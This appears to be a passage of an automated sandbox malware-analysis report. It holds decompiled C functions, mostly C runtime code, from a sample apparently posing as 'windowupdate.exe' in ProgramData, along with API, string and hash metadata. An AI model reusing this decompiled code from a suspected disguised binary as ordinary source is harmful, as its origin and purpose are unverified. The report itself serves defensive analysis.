                      				if(_v8 == 0x3f) {
                      					_t58 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t58 + 1;
                      					E00D4F820( &_v16, E00D53A20(__ebx, __edi, __esi,  &_v48,  &_v16, 0, E00D4F3F0( &_v40), 0));
                      					E00D56AB0(__ebx, __edi, __esi, _a4,  &_v16);
                      					return _a4;
                      				}
                      				if(_v8 == 0x58) {
                      					_t70 =  *0xf20640; // 0x0
                      					_t71 = _t70 + 1;
                      					 *0xf20640 = _t71;
                      					_t43 = E00D5A560( &_v16);
                      					__eflags = _t43;
                      					if(_t43 == 0) {
                      						_v32 = E00D50060("void ", 5);
                      						_v28 = _t71;
                      						E00D4FAA0(_a4,  &_v32,  &_v16);
                      						return _a4;
                      					}
                      					_v24 = E00D50060("void", 4);
                      					_v20 = _t71;
                      					E00D4F1F0(_a4,  &_v24);
                      					return _a4;
                      				}
                      				E00D56AB0(__ebx, __edi, __esi, _a4,  &_v16);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D5438D
                        • Part of subcall function 00D4F2A0: pDNameNode::pDNameNode.LIBCMTD ref: 00D4F2DA
                      • operator+.LIBVCRUNTIMED ref: 00D543C2
                      • DName::isEmpty.LIBCMTD ref: 00D543E4
                        • Part of subcall function 00D56AB0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D56AB9
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5445A
                      • Mailbox.LIBCMTD ref: 00D54476
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
                      • String ID: X$void$void
                      • API String ID: 3628514644-1260697050
                      • Opcode ID: 6acd83eabaeda4de42aaaf9380cdd654c8c137b97da3c700eaba9d1732f72b67
                      • Instruction ID: 4cd5d3c04aebe731adca30f408764bfa55082e0044a98ec2746f3ccc14aebd02
                      • Opcode Fuzzy Hash: 6acd83eabaeda4de42aaaf9380cdd654c8c137b97da3c700eaba9d1732f72b67
                      • Instruction Fuzzy Hash: 553183B6D40108ABDF14DF94DC82AEE7BB4EB54305F148158FD056B252EB70AB48DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E00D59D50(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				signed int _v5;
                      				char _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char* _t38;
                      				void* _t51;
                      				char* _t88;
                      				void* _t96;
                      				void* _t97;
                      
                      				_t95 = __esi;
                      				_t94 = __edi;
                      				_t65 = __ebx;
                      				_t38 =  *0xf20640; // 0x0
                      				if( *_t38 != 0) {
                      					E00D58D00(__ebx, __edi, __esi,  &_v20);
                      					_t97 = _t96 + 4;
                      					if(E00D5A6C0( &_v20) != 0) {
                      						E00D4FDE0( &_v20, 0x7b);
                      						_v5 = 0;
                      						L5:
                      						while(1 != 0) {
                      							if((_v5 & 0x000000ff) != 0) {
                      								E00D4FDE0( &_v20, 0x2c);
                      							}
                      							_t88 =  *0xf20640; // 0x0
                      							_v12 =  *_t88;
                      							_v12 = _v12 - 0x32;
                      							if(_v12 > 0xe) {
                      								L14:
                      								E00D4FD40( &_v20, E00D58D00(_t65, _t94, _t95,  &_v52));
                      								E00D4FDE0( &_v20, 0x3a);
                      								_t51 = E00D586C0(_t65, _t94, _t95,  &_v60);
                      								_t97 = _t97 + 8;
                      								E00D4FD40( &_v20, _t51);
                      								goto L15;
                      							} else {
                      								_t16 = _v12 + 0xd59f18; // 0xcccccc03
                      								switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M00D59F04))) {
                      									case 0:
                      										 *0xf20640 =  *0xf20640 + 1;
                      										_t58 = E00D59D50(_t65, _t94, _t95,  &_v28);
                      										_t97 = _t97 + 4;
                      										E00D4FD40( &_v20, _t58);
                      										goto L15;
                      									case 1:
                      										 *0xf20640 =  *0xf20640 + 1;
                      										 *0xf20640 =  *0xf20640 + 1;
                      										__ecx =  &_v36;
                      										__eax = E00D52860(__ebx, __edi, __esi,  &_v36);
                      										__ecx =  &_v20;
                      										__eax = E00D4FD40(__ecx, __eax);
                      										goto L15;
                      									case 2:
                      										 *0xf20640 =  *0xf20640 + 1;
                      										 &_v44 = E00D580D0(__ebx, __edi, __esi,  &_v44);
                      										__ecx =  &_v20;
                      										__eax = E00D4FD40(__ecx, __eax);
                      										goto L15;
                      									case 3:
                      										L15:
                      										if(E00D5A6C0( &_v20) != 0) {
                      											_t54 =  *0xf20640; // 0x0
                      											if( *_t54 != 0x40) {
                      												_v5 = 1;
                      												goto L5;
                      											}
                      											_t90 =  *0xf20640; // 0x0
                      											 *0xf20640 = _t90 + 1;
                      											goto L20;
                      										}
                      										E00D4F350(_a4, 2);
                      										return _a4;
                      									case 4:
                      										goto L14;
                      								}
                      							}
                      						}
                      						L20:
                      						E00D4FDE0( &_v20, 0x7d);
                      						E00D4F240(_a4,  &_v20);
                      						return _a4;
                      					}
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D59D67
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::isValid.LIBCMTD ref: 00D59D83
                      • DName::DName.LIBVCRUNTIMED ref: 00D59D91
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 4056879799-0
                      • Opcode ID: d05870a7f144315a8771bc426b74c94ccd5caa209adaba34dedc4db495227a16
                      • Instruction ID: 18e4d5ab2839ba68f5d3017f91f0806b6a1d9837157f4e4e2523030ee7b12b79
                      • Opcode Fuzzy Hash: d05870a7f144315a8771bc426b74c94ccd5caa209adaba34dedc4db495227a16
                      • Instruction Fuzzy Hash: F74166B1904118DBDF14EF50DCA69FEBB74BF50305F044529FC066A1A2EB31AA19DB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			E00DC20D0(intOrPtr _a4, short* _a8, char _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                      				signed short _v8;
                      				long _v12;
                      				void* _v16;
                      				signed int _v20;
                      				void* _v24;
                      				void* _v28;
                      				char _v32;
                      				void* _v36;
                      				long _v40;
                      				char _v44;
                      				char _v48;
                      				char _v52;
                      				struct _MEMORY_BASIC_INFORMATION _v80;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t80;
                      				void* _t81;
                      				struct HINSTANCE__* _t83;
                      				void* _t135;
                      				void* _t139;
                      				signed int _t140;
                      				void* _t146;
                      				void* _t149;
                      				void* _t151;
                      				intOrPtr _t155;
                      				intOrPtr* _t156;
                      				void* _t174;
                      				intOrPtr _t181;
                      				intOrPtr* _t188;
                      				intOrPtr _t190;
                      				signed int _t192;
                      				signed int _t195;
                      				intOrPtr* _t204;
                      				void* _t212;
                      				void* _t214;
                      				intOrPtr* _t215;
                      				signed int _t228;
                      
                      				 *_a16 = 0;
                      				_t212 = _a4 - 1;
                      				 *_a8 = 0;
                      				if(VirtualQuery(_t212,  &_v80, 0x1c) == 0 || E00DC24B0(_v80.AllocationBase, _a20, _a24) == 0) {
                      					L45:
                      					return 0;
                      				} else {
                      					_t80 = _v80.AllocationBase;
                      					if( *_t80 != 0x5a4d) {
                      						goto L45;
                      					} else {
                      						_t155 =  *((intOrPtr*)(_t80 + 0x3c));
                      						if(_t155 <= 0) {
                      							goto L45;
                      						} else {
                      							_t156 = _t155 + _t80;
                      							if( *_t156 != 0x4550) {
                      								goto L45;
                      							} else {
                      								_t214 = _t212 - _t80;
                      								_t195 =  *(_t156 + 6) & 0x0000ffff;
                      								_t190 = ( *(_t156 + 0x14) & 0x0000ffff) + 0x20;
                      								_t149 = 0;
                      								_t81 = 0;
                      								if(_t195 != 0) {
                      									_t188 = _t156 + _t190;
                      									do {
                      										_t190 =  *((intOrPtr*)(_t188 + 4));
                      										if(_t214 < _t190) {
                      											goto L9;
                      										} else {
                      											_t149 = _t214 - _t190;
                      											if(_t214 >=  *_t188) {
                      												goto L9;
                      											}
                      										}
                      										goto L10;
                      										L9:
                      										_t81 = _t81 + 1;
                      										_t188 = _t188 + 0x28;
                      									} while (_t81 < _t195);
                      								}
                      								L10:
                      								if(_t81 == _t195) {
                      									goto L45;
                      								} else {
                      									_v16 = _t81 + 1;
                      									if( *0xf237c9 != 0) {
                      										_t83 =  *0xf237c4;
                      										goto L16;
                      									} else {
                      										if( *0xf237c4 != 0) {
                      											goto L45;
                      										} else {
                      											_t83 = E00DC1C50(_t149, _t190, _t195, _t214);
                      											 *0xf237c4 = _t83;
                      											if(_t83 == 0) {
                      												goto L45;
                      											} else {
                      												 *0xf237c9 = 1;
                      												L16:
                      												_t215 = GetProcAddress(_t83, "PDBOpenValidate5");
                      												if(_t215 == 0) {
                      													goto L45;
                      												} else {
                      													 *0xdc62b0(_a20, 0, 0, 0,  &_v52, 0, 0,  &_v28);
                      													if( *_t215() == 0) {
                      														goto L45;
                      													} else {
                      														_v12 = 0;
                      														_v40 = 0;
                      														 *0xdc62b0();
                      														if( *((intOrPtr*)( *((intOrPtr*)( *_v28))))() == 0x1329141) {
                      															 *0xdc62b0(0, "r",  &_v36);
                      															if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() != 0) {
                      																 *0xdc62b0(_v16, _t149,  &_v24, 0, 0, 0);
                      																if( *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x20))))() != 0) {
                      																	 *0xdc62b0( &_v12);
                      																	if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x68))))() != 0) {
                      																		_t204 = _v12;
                      																		if(_t204 != 0) {
                      																			 *0xdc62b0();
                      																			if( *((intOrPtr*)( *((intOrPtr*)( *_t204 + 8))))() == 0) {
                      																				L29:
                      																				_t174 = 0;
                      																				goto L30;
                      																			} else {
                      																				while(1) {
                      																					 *0xdc62b0(0,  &_v32,  &_v8,  &_v44,  &_v20, 0);
                      																					if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))() == 0) {
                      																						goto L31;
                      																					}
                      																					if((_v8 & 0x0000ffff) != _v16) {
                      																						L28:
                      																						 *0xdc62b0();
                      																						if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))() != 0) {
                      																							continue;
                      																						} else {
                      																							goto L29;
                      																						}
                      																					} else {
                      																						_t181 = _v32;
                      																						if(_t181 > _t149 || _t149 >= _v44 + _t181) {
                      																							goto L28;
                      																						} else {
                      																							_t228 = _v20;
                      																							if(_t228 == 0 || _t228 >= 0x1fffffff) {
                      																								goto L31;
                      																							} else {
                      																								_t135 = HeapAlloc(GetProcessHeap(), 0, _t228 << 3);
                      																								_v16 = _t135;
                      																								if(_t135 == 0) {
                      																									goto L31;
                      																								} else {
                      																									 *0xdc62b0( &_v48, 0, 0, 0,  &_v20, _t135);
                      																									_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))();
                      																									_t174 = _v16;
                      																									if(_t139 == 0) {
                      																										L30:
                      																										HeapFree(GetProcessHeap(), 0, _t174);
                      																										goto L31;
                      																									} else {
                      																										_t151 = _t149 - _v32;
                      																										if(_t151 >=  *_t174) {
                      																											_t192 = _v20;
                      																											_t140 = 1;
                      																											if(_t192 > 1) {
                      																												while(_t151 >=  *((intOrPtr*)(_t174 + _t140 * 8))) {
                      																													_t140 = _t140 + 1;
                      																													if(_t140 < _t192) {
                      																														continue;
                      																													}
                      																													goto L43;
                      																												}
                      																											}
                      																											L43:
                      																											 *_a16 =  *(_t174 + _t140 * 8 - 4) & 0x00ffffff;
                      																											 *0xdc62b0(_v48, _a8,  &_a12, 0, 0, 0);
                      																											_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x70))))();
                      																											_t174 = _v16;
                      																											if(_t146 != 0) {
                      																												_v40 = 1;
                      																											}
                      																										}
                      																										goto L30;
                      																									}
                      																									goto L34;
                      																								}
                      																							}
                      																							goto L46;
                      																						}
                      																					}
                      																					goto L31;
                      																				}
                      																			}
                      																			L31:
                      																			 *0xdc62b0();
                      																			 *((intOrPtr*)( *((intOrPtr*)( *_v12))))();
                      																		}
                      																	}
                      																	 *0xdc62b0();
                      																	 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x40))))();
                      																}
                      																 *0xdc62b0();
                      																 *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x38))))();
                      															}
                      														}
                      														L34:
                      														 *0xdc62b0();
                      														 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x2c))))();
                      														return _v40;
                      													}
                      												}
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				L46:
                      			}

                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00D32421,Runtime Check Error. Unable to display RTC Message.), ref: 00DC20F5
                        • Part of subcall function 00DC24B0: GetModuleFileNameW.KERNEL32(00D3241C,?,00DC2111,?,00DC2111,?,00D3241C,00DC1975), ref: 00DC24BF
                      • GetProcAddress.KERNEL32(?,PDBOpenValidate5), ref: 00DC21BF
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DC231C
                      • HeapFree.KERNEL32(00000000), ref: 00DC2323
                      • GetProcessHeap.KERNEL32 ref: 00DC2394
                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00DC239E
                      Strings
                      • PDBOpenValidate5, xrefs: 00DC21B9
                      • Runtime Check Error. Unable to display RTC Message., xrefs: 00DC20DB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$Process$AddressAllocFileFreeModuleNameProcQueryVirtual
                      • String ID: PDBOpenValidate5$Runtime Check Error. Unable to display RTC Message.
                      • API String ID: 3872449310-425978220
                      • Opcode ID: 5a16eed032f1bc5d1cf9b28539694f9c54b191d118be9f4031525b408207ede4
                      • Instruction ID: c5b7fedb5516408f91ff516a8881208caa449ba2ca41417a1426eef7c251f76c
                      • Opcode Fuzzy Hash: 5a16eed032f1bc5d1cf9b28539694f9c54b191d118be9f4031525b408207ede4
                      • Instruction Fuzzy Hash: C4B13A75A0021A9FDF15DBA4C854FBEB7B6FB88710F184059E902E7390DB35ED028BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00D8A760(void* __ecx, void* __edi, intOrPtr _a4) {
                      				char _v8;
                      				signed int _v12;
                      				char _v16;
                      				signed int _v20;
                      				char _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				char _v52;
                      				char _v56;
                      				char _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				signed int _v76;
                      				intOrPtr _v80;
                      				char _v84;
                      				signed char _t84;
                      				intOrPtr _t97;
                      				intOrPtr _t105;
                      				char* _t112;
                      				void* _t116;
                      				void* _t118;
                      				void* _t156;
                      				void* _t159;
                      
                      				_t156 = __edi;
                      				_t118 = __ecx;
                      				if(_a4 != 0) {
                      					__eflags = _a4 - 2;
                      					if(_a4 == 2) {
                      						L5:
                      						_v28 = 1;
                      						L6:
                      						_v32 = _v28;
                      						__eflags = _v32;
                      						if(__eflags == 0) {
                      							_t116 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0, L"%ls", L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments");
                      							_t159 = _t159 + 0x18;
                      							__eflags = _t116 - 1;
                      							if(_t116 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v32;
                      						if(_v32 != 0) {
                      							_push(0);
                      							E00D8B670();
                      							_v52 = 0x104;
                      							_v56 = 0;
                      							E00D8ACA0( &_v56, "C:\ProgramData\windowupdate.exe",  &_v52);
                      							_v60 = 0xf20718;
                      							E00D8B3E0( &_v60);
                      							_push(0);
                      							_v20 = E00D8B770();
                      							__eflags = _v20;
                      							if(_v20 == 0) {
                      								L14:
                      								_v36 = 0xf20718;
                      								L15:
                      								_v40 = _v36;
                      								_v12 = 0;
                      								_v24 = 0;
                      								E00D8ACE0(_v40, 0, 0,  &_v12,  &_v24);
                      								E00D8B460( &_v8, E00D8B890(_t156, _v12, _v24, 1));
                      								_t84 = E00D8B520( &_v8);
                      								__eflags = _t84 & 0x000000ff;
                      								if((_t84 & 0x000000ff) != 0) {
                      									_v44 = E00D8B6D0( &_v8);
                      									_v68 = E00D8B6D0( &_v8) + _v12 * 4;
                      									E00D8ACE0(_v40, _v44, _v68,  &_v12,  &_v24);
                      									__eflags = _a4 - 1;
                      									if(_a4 != 1) {
                      										E00D8B480( &_v16, 0);
                      										_v48 = E00D8B690(_v44, E00D8B730( &_v16));
                      										__eflags = _v48;
                      										if(_v48 == 0) {
                      											 *0xf2153c = E00D8B590(E00D8B440( &_v84,  &_v16));
                      											_t97 = E00D8B610( &_v16);
                      											_push(0);
                      											 *((intOrPtr*)(E00D8B750())) = _t97;
                      											_v80 = 0;
                      											E00D8B4E0( &_v16);
                      											E00D8B4C0( &_v8);
                      											return _v80;
                      										}
                      										_v76 = _v48;
                      										E00D8B4E0( &_v16);
                      										E00D8B4C0( &_v8);
                      										return _v76;
                      									}
                      									 *0xf2153c = _v12 - 1;
                      									_t105 = E00D8B5E0( &_v8);
                      									_push(0);
                      									 *((intOrPtr*)(E00D8B750())) = _t105;
                      									_v72 = 0;
                      									E00D8B4C0( &_v8);
                      									return _v72;
                      								}
                      								 *((intOrPtr*)(L00D82F70( &_v8))) = 0xc;
                      								_v64 = 0xc;
                      								E00D8B4C0( &_v8);
                      								return _v64;
                      							}
                      							_t112 = _v20;
                      							__eflags =  *_t112;
                      							if( *_t112 == 0) {
                      								goto L14;
                      							}
                      							_v36 = _v20;
                      							goto L15;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t118))) = 0x16;
                      							E00D82900(L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments", L"common_configure_argv", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0);
                      							return 0x16;
                      						}
                      					}
                      					__eflags = _a4 - 1;
                      					if(_a4 == 1) {
                      						goto L5;
                      					}
                      					_v28 = 0;
                      					goto L6;
                      				}
                      				return 0;
                      			}































                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\ProgramData\windowupdate.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
                      • API String ID: 0-3664916958
                      • Opcode ID: 4c34c17d07a92d12a8e64dbe4790661ea24f372ef244b5111366b3c317a6d2b9
                      • Instruction ID: d5d53285b68e746b451573a37193806b60dfc35b278ada97dc7dc50977051b32
                      • Opcode Fuzzy Hash: 4c34c17d07a92d12a8e64dbe4790661ea24f372ef244b5111366b3c317a6d2b9
                      • Instruction Fuzzy Hash: EC7130B5D0020CABEB14FF98D856BEEB7B4EF54314F14415AE1016B292EB749A44CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00D4D500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				void* _t75;
                      				void* _t76;
                      				signed char _t77;
                      				void* _t80;
                      				void* _t87;
                      				signed char _t88;
                      				void* _t126;
                      				void* _t127;
                      				void* _t130;
                      				void* _t131;
                      
                      				_t125 = __esi;
                      				_t124 = __edi;
                      				_t91 = __ecx;
                      				_t90 = __ebx;
                      				E00D4E290(__ecx, _a12);
                      				_t127 = _t126 + 4;
                      				if( *((intOrPtr*)(E00D4C670(__ebx, _t91, __edi, __esi) + 0x20)) != 0 ||  *_a4 == 0xe06d7363 ||  *_a4 == 0x80000026) {
                      					L6:
                      					if(( *(_a4 + 4) & 0x00000066) == 0) {
                      						E00D4D6F0( &_v28, _a20, 0);
                      						if(E00D4E140( &_v28) != 0) {
                      							L16:
                      							if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) < 3 ||  *((intOrPtr*)(_a4 + 0x14)) <= 0x19930522) {
                      								L21:
                      								E00D4CD60(_t90, _t124, _t125, _a4, _a8, _a12, _a16, _a20, _a32 & 0x000000ff, _a24, _a28);
                      								L22:
                      								return 1;
                      							} else {
                      								_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
                      								if(_v8 == 0) {
                      									goto L21;
                      								}
                      								_v16 = _v8;
                      								_v12 = _v16;
                      								 *0xdc62b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32 & 0x000000ff);
                      								_v20 = _v12();
                      								return _v20;
                      							}
                      						}
                      						_t75 = E00D4E130(_a20);
                      						_t130 = _t127 + 4;
                      						if(_t75 < 0x19930521) {
                      							L14:
                      							_t106 = _a20;
                      							_t76 = E00D4E130(_a20);
                      							_t131 = _t130 + 4;
                      							if(_t76 < 0x19930522) {
                      								goto L22;
                      							}
                      							_t77 = E00D4E190(_t106, _a20);
                      							_t127 = _t131 + 4;
                      							if((_t77 & 0x000000ff) == 0) {
                      								goto L22;
                      							}
                      							goto L16;
                      						}
                      						_t80 = E00D4E100(_a20);
                      						_t127 = _t130 + 4;
                      						if(_t80 != 0) {
                      							goto L16;
                      						}
                      						goto L14;
                      					}
                      					if(E00D4DF10(_a16, _a20) != 0 && _a24 == 0) {
                      						E00D4DD70(_a8, _a16, _a20);
                      					}
                      					return 1;
                      				} else {
                      					_t87 = E00D4E130(_a20);
                      					_t127 = _t127 + 4;
                      					if(_t87 < 0x19930522) {
                      						goto L6;
                      					}
                      					_t88 = E00D4E160(_a20, _a20);
                      					_t127 = _t127 + 4;
                      					if((_t88 & 0x000000ff) == 0) {
                      						goto L6;
                      					}
                      					return 1;
                      				}
                      			}


















                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00D4D50A
                        • Part of subcall function 00D4E290: __guard_icall_checks_enforced.LIBCMTD ref: 00D4E296
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4D512
                      • __FrameHandler3::isEHs.LIBVCRUNTIMED ref: 00D4D54A
                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 00D4D594
                      • _Smanip.LIBCPMTD ref: 00D4D5AF
                      • __FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 00D4D5FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
                      • String ID: csm$csm
                      • API String ID: 2671830719-3733052814
                      • Opcode ID: c45ba9bca224981de7708531827a12a5bf300acdc330e5705926cd19ae3c4be0
                      • Instruction ID: 5f23191036a2a37808e5a213c8089501f2fe8491bbabb21484a1c61297c87d59
                      • Opcode Fuzzy Hash: c45ba9bca224981de7708531827a12a5bf300acdc330e5705926cd19ae3c4be0
                      • Instruction Fuzzy Hash: AA512BB5A00109ABDF04DF99D885AAF77BAAF58304F188558F9098B241EB34ED51CBF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00D4D280(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                      				signed int* _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				char _v24;
                      				char _v32;
                      				char _v40;
                      				intOrPtr _v44;
                      				char _v48;
                      				intOrPtr _v64;
                      				char _v68;
                      				void* __esi;
                      				intOrPtr* _t56;
                      				signed char _t61;
                      				void* _t78;
                      				void* _t79;
                      				void* _t83;
                      				void* _t125;
                      				void* _t126;
                      
                      				_t123 = __edi;
                      				_t84 = __ebx;
                      				_t56 = _a4;
                      				if( *_t56 == 0x80000003) {
                      					return _t56;
                      				}
                      				if( *((intOrPtr*)(E00D4C670(__ebx, __ecx, __edi, _t124) + 8)) != 0) {
